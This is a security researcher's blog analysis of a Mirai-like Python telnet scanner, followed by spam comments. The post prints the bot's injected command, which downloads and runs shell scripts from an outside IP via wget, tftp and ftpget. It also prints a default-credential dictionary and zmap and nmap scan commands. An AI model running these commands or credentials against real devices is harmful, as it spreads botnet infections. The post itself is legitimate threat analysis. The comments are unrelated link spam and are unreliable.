Mirai-alike Python Scanner
Last week, I found an interesting Python script that behaves like a Mirai bot[1]. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. The script has been uploaded to VT and has a low score of 2/59[2]. Indeed, it does not contain suspicious strings nor API calls. Just a simple but powerful scanner.
Here are the commands injected when a device is found with vulnerable credentials:
rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.10.84/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.148.10.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.148.10.84; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.148.10.84 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh" #command to send
The IP address 45.148.10.84 is offline at the moment but has already a bad reputation and is present in multiple blocklists.
Here is the list of credential pairs tested:
combo = [ "root:root", "root:", "admin:admin", "telnet:telnet", "support:support", "user:user", "admin:", "admin:password", "root:vizxv", "root:admin", "root:xc3511", "root:888888", "root:xmhdipc", "root:default", "root:juantech", "root:123456", "root:54321", "root:12345", "root:pass", "ubnt:ubnt", "root:klv1234", "root:Zte521", "root:hi3518", "root:jvbzd", "root:anko", "root:zlxx.", "root:7ujMko0vizxv", "root:7ujMko0admin", "root:system", "root:ikwb", "root:dreambox", "root:user", "root:realtek", "root:00000000", "admin:1111111", "admin:1234", "admin:12345", "admin:54321", "admin:123456", "admin:7ujMko0admin", "admin:1234", "admin:pass", "admin:meinsm", "admin:admin1234", "root:1111", "admin:smcadmin", "admin:1111", "root:666666", "root:password", "root:1234", "root:klv123", "Administrator:admin", "service:service", "supervisor:supervisor", "guest:guest", "guest:12345", "guest:12345", "admin1:password", "administrator:1234", "666666:666666", "888888:888888", "tech:tech", "mother:fucker" ]
The script is pretty well written and is multi-threaded to speed up the scan:
for l in xrange(threads): try: t = threading.Thread(target=worker) t.start() except: pass
The script does not implement a random IP address generator, it just uses the zmap[3] scanner:
zmap -p23 -N 10000 -f saddr -q --verbosity=0
This command will return 10000 IP addresses that expose a telnet port.
The question that arises when you find this kind of script is: "Can we really find so many devices exposing a telnet interface into the wild in 2020?". I did my own test and launched the above zmap command. In a few seconds, 10K IP addresses were returned. Then, I used the nmap scanner with the 'banner' script to grab telnet banners:
nmap -sC --script=banner -p 23 -Pn -iL open-telnet.txt -oA telnet-banners -v -n
I found a lot of banners that disclose the type of devices (routers, WiFi access points, switches, VoIP gateways, IoT, ...). More interesting, a found some devices still bricked by the BrickerBot:
# telnet x.x.x.x Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop (7/31 2020): hxxp://depastedihrn3jtw[.]onion/show.php?md5=20735856837081a18e6f0edf2c1e8d76 Internet Chemotherapy Part 12 - Third Time is the Charm? (9/6 2020) hxxp://depastedihrn3jtw[.]onion/show.php?md5=4c17df6b30ed2704082465d9a1c4ea86 DeepPaste is temperamental (unreachable 75% of time) so if the links are not loading then try again later. Update 10/3: So I have been looking into reconditioning Tenda/Intelbras, Genexis and Zte routers.. Still WIP but seen some positive impact over the last few days/weeks. Update 10/6: ..and Totolink.. 10/9: some new tricks for netis, TVT and Tata Consulting.. what next? Update 10/17: Getting in the Zhone.. seeing real IoT action in 2020 at last (none) login:
I found plenty of notifications and disclaimers warning you that connecting to the device is prohibited, your IP will be logged, etc. Please, don't waste your time to implement such unuseful banners, just get rid of telnet!
[1] https://www.cyber.nj.gov/threat-center/threat-profiles/botnet-variants/mirai-botnet
[2] https://www.virustotal.com/gui/file/89daf232e0658103883fa05b8968093675b5aa4b6be3fdbd46757144095daf64/details
[3] https://github.com/zmap/zmap
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments
Anonymous
Dec 3rd 2022
9 months ago
Anonymous
Dec 3rd 2022
9 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
Anonymous
Dec 26th 2022
8 months ago
Anonymous
Dec 26th 2022
8 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
8 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
8 months ago
Anonymous
Dec 26th 2022
8 months ago
https://defineprogramming.com/
Dec 26th 2022
8 months ago
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
https://defineprogramming.com/
Dec 26th 2022
8 months ago
rthrth
Jan 2nd 2023
8 months ago